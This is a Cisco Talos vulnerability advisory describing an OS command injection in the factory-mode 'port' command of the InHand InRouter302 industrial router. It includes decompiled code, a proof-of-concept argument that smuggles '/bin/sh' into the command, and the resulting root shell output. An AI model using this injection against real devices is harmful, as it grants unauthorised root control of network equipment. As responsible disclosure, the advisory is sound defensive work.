Talos Vulnerability Report


InHand Networks InRouter302 console infactory_port OS command injection vulnerability

May 10, 2022
CVE Number



An OS command injection vulnerability exists in the console infactory_port functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

Tested Versions

InHand Networks InRouter302 V3.5.37

Product URLs

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

CVSSv3 Score

9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)


The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

Here is the prompt after the login:

        Welcome to Router console
    Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
Model                : IR302-WLAN
Serial Number        : RF3022141057203
Description          : www.inhandnetworks.com
Current Version      : V3.5.37
Current Bootloader Version : 1.1.3.r4955
get help for commands
type '?' for detail help at any point
help           -- get help for commands
language       -- Set language
show           -- show system information
exit           -- exit current mode/console
ping           -- ping test
comredirect    -- COM redirector
telnet         -- telnet to a host
traceroute     -- trace route to a host
enable         -- turn on privileged commands
infactory      -- factory mode

The infactory command allows, provided the correct password, to change some configuration and performs various tests. The factory mode view:

Router> infactory 
input password: 
get help for commands
type '?' for detail help at any point
help           -- get help for commands
language       -- Set language
exit           -- exit current mode/console
reboot         -- reboot system
factory-model  -- hardware model configure
modem          -- modem test
reset-key      -- check the status of the reset button
com            -- detecting serial ports
port           -- FCT network port test
net            -- complete machine network port test
led            -- LED lights test
wlan           -- Wi-Fi test
mem            -- check memory
hw_wdg         -- check the hardware watchdog status
dio            -- detect digital I/O
stategridsec   -- detect stategrid security chip

This mode offers several functionalities. For instance, the port functionality allows to set up or down the specified interface.

undefined4 port_functionality(undefined4 param_1,int command_line)


  command_line_ptr[0] = command_line;
  if (command_line != 0) {
    first_arg = (char *)maybe_get_next_token(command_line_ptr);
    if (*first_arg != '\0') {
      is_equal = strncmp(first_arg,"status",6);
      if (is_equal == 0) {
      else {
        is_equal = strncmp(first_arg,"up",2);
        if (((is_equal != 0) && (is_equal = strncmp(first_arg,"down",4), is_equal != 0)) ||
           (interface_name = (char *)maybe_get_next_token(command_line_ptr), *interface_name == '\0'    [1]
           )) goto LAB_00411340;
        is_equal = strncmp(interface_name,"lan0",4);
        if ((is_equal != 0) || (is_equal = strncmp(first_arg,"down",4), is_equal != 0)) {
          snprintf(command_to_execute,0x40,"ip link set %s %s",interface_name,first_arg);               [2]
          system(command_to_execute);                                                                   [3]

If the first provided argument is up, then the second one, parsed at [1], will be later used at [2] to form the string ip link set <interface> up. This string will later be used at [3] as argument of the system function.

The second argument is not properly sanitized, and a command injection can occur at [3]. An attacker, able to reach the net functionality, would be able to obtain a root shell.

Exploit Proof of Concept

Provided the command port up a$IFSa$IFS;/bin/sh;, in the factory mode view, a root shell will be obtained:

Router(factory)# port up a$IFSa$IFS;/bin/sh;
BusyBox v1.26.2 (2022-02-23 16:03:56 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/www # help
Built-in commands:
    . : [ [[ break cd chdir continue echo eval exec exit export false
    hash help history let local printf pwd read readonly return set
    shift source test times trap true type ulimit umask unset wait
/www # 

Vendor Response

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4



2022-03-30 - Vendor Disclosure
2022-05-10 - Public Release
2022-05-10 - Vendor Patch Release


Discovered by Francesco Benvenuto of Cisco Talos.